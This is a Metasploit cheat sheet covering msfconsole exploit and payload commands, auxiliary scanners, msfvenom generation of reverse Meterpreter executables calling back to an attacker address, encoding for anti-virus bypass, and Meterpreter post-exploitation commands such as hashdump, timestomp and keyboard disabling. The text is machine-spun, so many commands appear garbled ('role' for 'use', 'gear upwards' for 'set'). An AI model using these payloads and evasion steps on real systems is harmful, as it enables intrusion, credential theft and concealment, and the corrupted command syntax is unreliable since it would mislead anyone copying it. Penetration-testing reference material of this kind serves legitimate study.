Metasploit Cheat Sheet
The Metasploit Project is a estimator safety projection that provides information on vulnerabilities, helping inward the evolution of penetration tests as well as IDS signatures.
Metasploit is a pop tool used past times pentest experts.
Metasploit :
Search for module:
msf > search [regex]
Specify as well as exploit to use:
msf > role exploit/[ExploitPath]
Specify a Payload to use:
msf > gear upwards PAYLOAD [PayloadPath]
Show options for the electrical current modules:
msf > demonstrate options
Set options:
msf > gear upwards [Option] [Value]
Start exploit:
msf > exploit
Useful Auxiliary Modules
Port Scanner:
msf > role auxiliary/scanner/portscan/tcp msf > gear upwards RHOSTS 10.10.10.0/24 msf > run
DNS Enumeration:
msf > role auxiliary/gather/dns_enum msf > gear upwards DOMAIN target.tgt msf > run
FTP Server:
msf > role auxiliary/server/ftp msf > gear upwards FTPROOT /tmp/ftproot msf > run
Proxy Server:
msf > role auxiliary/server/socks4 msf > run
msfvenom :
The msfvenom tool tin move used to generate Metasploit payloads (such every bit Meterpreter) every bit standalone files as well as optionally encode them. This tool replaces the onetime msfpayload as well as msfencode tools. Run amongst ‘'-l payloads’ to perish a listing of payloads.
$ msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost (if contrary conn.)] LPORT=[LocalPort]
Example :Reverse Meterpreter payload every bit an executable as well as redirected into a file:
$ msfvenom -p windows/meterpreter/ reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
Format Options (specified amongst –f) --help-formats – List available output formatsexe – Executable pl – Perl rb – Ruby raw – Raw shellcode c – C code
Encoding Payloads amongst msfvenom
The msfvenom tool tin move used to apply a marking of encoding for anti-virus bypass. Run amongst '-l encoders' to perish a listing of encoders.
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeInterations] LHOST=[LocalHost (if contrary conn.)] LPORT=[LocalPort]
ExampleEncode a payload from msfpayload v times using shikata-ga-nai encoder as well as output every bit executable:
$ msfvenom -p windows/meterpreter/ reverse_tcp -i v -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Metasploit Meterpreter
Base Commands:
? / help: Display a summary of commands leave of absence / quit: Exit the Meterpreter session
sysinfo: Show the arrangement cite as well as OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display electrical current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / take directory
edit: Open a file inward the default editor (typically vi)
Process Commands:
getpid: Display the procedure ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display procedure list.
kill: Terminate a procedure given its procedure ID.
execute: Run a given programme amongst the privileges of the procedure the Meterpreter is loaded in.
migrate: Jump to a given finish procedure ID
- Target procedure must convey same or lesser privileges
- Target procedure may move a to a greater extent than stable process
- When within a process, tin access whatever files that procedure has a lock on.
Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table
Misc Commands:
idletime: Display the duration that the GUI of thetarget car has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save every bit an icon a screenshot of the target machine.
Additional Modules:
role [module]: Load the specified module
Example:
role priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp:Alter NTFS file timestamps
Managing Sessions
Multiple Exploitation:
Run the exploit expecting a unmarried session that is right away backgrounded:
msf > exploit -z
Run the exploit inward the background expecting ane or to a greater extent than sessions that are right away backgrounded:msf > exploit –j
List all electrical current jobs (usually exploit listeners):
msf > jobs –l
Kill a job:
msf > jobs –k [JobID]
Multiple Sessions:
List all backgrounded sessions:
msf > sessions -l
Interact amongst a backgrounded session:
msf > session -i [SessionID]
Background the electrical current interactive session:
meterpreter > or meterpreter > background
Routing Through Sessions:
All modules (exploits/post/aux) against the target subnet mask volition move pivoted through this session.
msf > road add together [Subnet to Route To] [Subnet Netmask] [SessionID]